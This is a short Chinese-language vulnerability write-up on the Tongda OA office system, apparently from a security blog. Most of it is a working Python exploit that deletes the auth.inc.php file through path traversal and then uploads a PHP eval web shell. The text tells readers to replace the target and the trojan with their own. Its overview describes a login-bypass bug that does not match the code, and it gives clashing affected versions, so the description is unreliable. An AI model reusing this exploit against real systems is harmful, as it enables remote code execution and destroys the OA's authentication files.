漏洞概述
通達OA是一套國内常用的辦公系統,在V11.X<V11.5和通達OA 2017版本中存在任意使用者登入漏洞。攻擊者在遠端且未經授權的情況下,通過此漏洞可以以任意使用者身份登入到系統(包括系統管理者)。
影響版本
通達OAv11.6版本
環境搭建
下載下傳位址
https://pan.baidu.com/s/1VqUUNUsgsssK1Mhq2r8HHQ
提取碼:him4
一鍵預設安裝
端口配置
伺服器配置
接着通路http://localhost/
漏洞複現
Poc
import requests
target="http://localhost/"
payload="<?php eval($_REQUEST['a']);?>"
print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")
input("Press enter to continue")
print("[*]Deleting auth.inc.php....")
url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
requests.get(url=url)
print("[*]Checking if file deleted...")
url=target+"/inc/auth.inc.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
print("[-]Failed to deleted auth.inc.php")
exit(-1)
print("[+]Successfully deleted auth.inc.php!")
print("[*]Uploading payload...")
url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
files = {'FILE1': ('hack.php', payload)}
requests.post(url=url,files=files)
url=target+"/_hack.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
print("[+]Filed Uploaded Successfully")
print("[+]URL:",url)
else:
print("[-]Failed to upload file")
将exp中的target替換為目标url
Payload替換為自己的木馬即可
直接連接配接即可
修複建議
更新到最新版